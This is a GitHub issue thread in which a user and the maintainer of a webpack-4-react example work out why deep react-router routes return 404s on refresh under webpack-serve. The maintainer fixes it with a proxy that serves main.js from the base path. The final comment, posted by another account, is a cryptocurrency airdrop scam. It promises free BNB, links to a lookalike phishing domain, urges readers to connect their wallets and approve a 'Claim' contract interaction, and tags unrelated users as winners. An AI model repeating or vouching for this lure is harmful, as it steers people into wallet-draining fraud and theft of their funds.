### ISSUE TITLE
How to add Routing?

### ISSUE THREAD

**Issue by chobo2** [bodaz/webpack-4-react#1]
Hi

Could you add to your example how to add routing and fallback api to webpack-serve.

Right now if you have something like http://localhost:8080/student/1/course/1. After the first load you will get 404s errors(if you try to refresh the page, for example through hot reload)

**Comment by bodaz** [comment]
Since this repo uses React as the client side library you can use [react-router](https://reacttraining.com/react-router/web/guides/quick-start) for managing routing options

**Comment by chobo2** [comment]
@bodaz 

Hey, I am using react-router already.

Say you  add a " <Link to="/student-details/student/1/course/1"> </Link>" and you are working locally on this page. 

I load up my localhost, click that link to go to that page and it will load up fine.  Now say I change something and "hot-reload" is triggered when webpack-serve goes to update, I will get a 404 on refresh.

**Comment by bodaz** [comment]
See the latest code, now you should be able to refresh on any other non-index.html pages with `react-router` and still get the content you expected

**Comment by chobo2** [comment]
@bodaz 

I can refresh simple routes but not the route that I specified in my OP. I still get a blank page even with your new changes.

I made my own repo to try to mimic what you have, you can see my code here: https://github.com/chobo2/webpack-serve-example

**Comment by bodaz** [comment]
Found the issue for me, the cause was when refreshing other sub-directories such as `http://localhost:8080/student/1/course/1`, the server still requests `main.js` from `http://localhost:8080/student/1/course/1/main.js` - you can check so by opening up browser dev tool, go to the Network panel and see what status is on `main.js`, my was 404 Not Found.

The latest change should fix this now, by adding a proxy layer so when requesting to sub-directories files they will be loaded from the base directory as this is a client-side rendering app and we serve everything through `main.js`

**Comment by chobo2** [comment]
Yes, in my test project what you added seems to be working. I will have to go ahead and implement it in my real project to see if it still works.

I was surprised of your solution though, I really thought the answer was something with "app.use(router.routes());" which I saw in the documentation.

I also see you added alot of comments what is awesome what I got to read to understand all this more.

What is " devtool: "inline-source-map","? 

You should try to get your project as a link on webpack-serve website so other people can use it, the documentation is lacking too much for beginners like me.

**Comment by chobo2** [comment]
I guess the only thing I can notice is you now hardcoded to 8080, what will be the case most the time but sometime if your running multiple projects at once it might not be 8080.

**Comment by chobo2** [comment]
@bodaz 

One other thing I noticed(maybe need to make it as a new ticket) but changes to .sass files do not trigger a hot reload.

**Comment by YuriyEmpty** [comment]
# $BNB Airdrop Guide: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.000k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @jasheal, @shanefontaine, @huan76, @Magren0321, @yvan91, @lzhang, @kraserge
